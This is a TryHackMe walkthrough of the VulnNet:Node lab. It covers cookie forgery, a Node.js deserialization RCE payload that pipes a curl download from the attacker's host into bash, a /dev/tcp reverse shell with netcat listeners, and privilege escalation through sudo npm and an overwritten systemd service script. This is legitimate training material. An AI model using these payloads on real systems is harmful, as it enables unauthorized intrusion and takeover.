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VulnNet:Node TryHackMe Writeup/Walkthrough

VulnNet Entertainment has moved its infrastructure and now they’re confident that no breach will happen again. You’re tasked to prove otherwise and penetrate their network.

Scan the machine.

If you are unsure how to tackle this, I recommend checking out the Nmap Tutorials by Hack Hunt.

nmap -sV -Pn <IP>

Open Ports

Looks like we have one port open: 8080.

Searchspolit Search

Found RCE, maybe off some use later.

I did gobuster scan but didn’t find much really. I checked the website then.


Nothing much on this blogs but found a LOGIN NOW page.

Nothing much to work with. I then checked the cookies under Inspect Element > Storage. I copied and paste the value onto the CyberChef website.

Use URL Decode and From Base64 to get the text.

Decoded Text

I change the text to: {"username": "Admin", "isAdmin":true, "encoding":"utf-8"} and encoded the text with ToBase64 and then URL Encode. Just as how we decrypted it.

Encoded Text

Copy this text and paste it in the value field and refresh the webpage. For a flash second I see something Admin. Let’s fireup BurpSuite.

Intercept the request and check in repeater.

Admin Login Page

Got Admin access.

Delete part of cookie and check their error handling system. Fascinatingly there are direct error messages.

Error Message

Searched cookie exploit online and will found an interesting cookie exploit on exploit-db.

Reading into the exploit

I then create a file called with the content -> bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1 and started a local server using python -> python3 -m http.server


Also, start a netcat listener in other terminal -> nc -lvnp 4444.

Now lets configure the cookie and send it to the server.

I configure it according the need of the server -> {"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl <YOUR_IP>:8000/ | bash ', function(error, stdout, stderr) { console.log(stdout) });\n }()","isAdmin":true,"encoding": "utf-8"}

Encode Shell

Encode the cookie

Paste this after session= under cookie and send the request in BurpSuite.

Go back to your terminal where you had nc listener. You will see a reverse connection.

Got Shell

I looked around and checked my access for this shell.


There was nothing much. I then checked what programs I can run using sudo -l.

Sudo L

We can run npm as serv-manage. Let’s search this on GTFOBins. I found the exploit to get the sudo access.

Got User

BAAM! We got the access.

Let’s stabilize the shell first. CMD -> python -c 'import pty;pty.spawn("/bin/bash")'

Stable Shell

I got the user flag.

Privilege Escalation

For the root, let’s check what programs I can run.


Seems like I can run three commands as root.

Let’s find this vulnnet-auto.timer file. For this we can use locate command.

Locate File

We have write access to this file as we are in serv-manage group.

Let’s check the content of this file.

File Content

Seems like this file is running other file called vulnnet-job.service

[Viewing the file]

This file is running a bash script. We can replace the bash script with the pervious curl command and get the root access. (If you have shutdown the python server, start it again)

I was not able to edit it properly. So I copied the content and created a file with the same name locally.

Also change the port in to 4445

Content Exploit

I then sent this file to the server using curl command.

Get Files

Also dont forgot to start a listener again in a different terminal -> nc -lvnp 4445

Wait for a bit and you will get the connection. If not, run the command to which we had access -> sudo /bin/systemctl stop vulnnet-auto.timer and then sudo /bin/systemctl start vulnnet-auto.timer

Got Shell

You know what to do next :stuck_out_tongue_winking_eye:

Root Flag